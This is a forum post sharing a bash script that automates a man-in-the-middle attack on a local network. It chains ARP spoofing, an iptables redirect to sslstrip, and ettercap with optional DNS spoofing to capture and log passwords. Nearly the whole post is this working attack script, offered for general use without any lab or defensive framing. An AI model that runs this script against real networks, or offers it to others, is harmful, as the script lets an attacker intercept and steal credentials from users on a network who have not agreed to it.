Thread: Script for dns spoof and sniffing passwords with ettercap, ssl strip, and arp spoof.

Threaded View

Just burned his ISO

Cool Script for dns spoof and sniffing passwords with ettercap, ssl strip, and arp spoof.

I modified a script that i found, hopefully made it a little more user friendly. I hope that it will be a benefit to the community.
    This script used ARP Spoof, SSL Strip, and ETTERCAP to sniff passwords and logs the findings to a user-specified folder. When you exit ETTERCAP properly, you will see the results from the log file using etterlog. Again, hopefully this will benefit the community.

And also as a reminder, I don't take full credit for this script. I used the good ideas from other scripts and made this one. Also, this probably isn't perfect, so feel free to adjust it to your liking.
    Code:
    #!/bin/bash
    echo -e "Please ensure \E[32m\033[1m'echo 1 > /proc/sys/net/ipv4/ip_forward'\E[37m\033[0m has been performed as root"
    echo -e "If you plan to spoof change your IP in \E[32m\033[1m'/usr/share/ettercap/etter.dns'\E[37m\033[0m"
    echo -n "Please enter the name of the folder that will be created with all the log files:    "
    read -e folder
    echo -n "please enter the name of the log file:    "
    read -e file
    echo -n "Please enter the router IP:    "
    read routerip
    echo -n "Please enter interface name (eg: wlan0):    "
    read iface
    echo -n "Would you like to dns spoof at this time? [y/n]"
    read spoof
    sudo mkdir /root/$folder
    sudo xterm -geometry 75x15+1+300 -T "ARP Spoof" -e arpspoof -i $iface $routerip &
    sleep 2
    sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 &
    echo "Routed IP Tables"
    sudo xterm -geometry 75x15+500+300 -T "SSL Strip" -e sslstrip -a -k -f &
    echo "SSL Strip Launched successfully"
    sleep 2
    if [ "$spoof" = "n" ]; then
    sudo xterm -geometry 75x15+1000+300 -T Ettercap -e ettercap -T -q -i $iface -l /root/$folder/$file -P autoadd
    else
    sudo xterm -geometry 75x15+1000+300 -T Ettercap -e ettercap -T -q -i $iface -P dns_spoof
    fi
    killall sslstrip
    killall arpspoof
    sudo etterlog -p -i /root/$folder/$file.eci
    exit
    Last edited by cqghost; 05-22-2010 at 08:55 AM.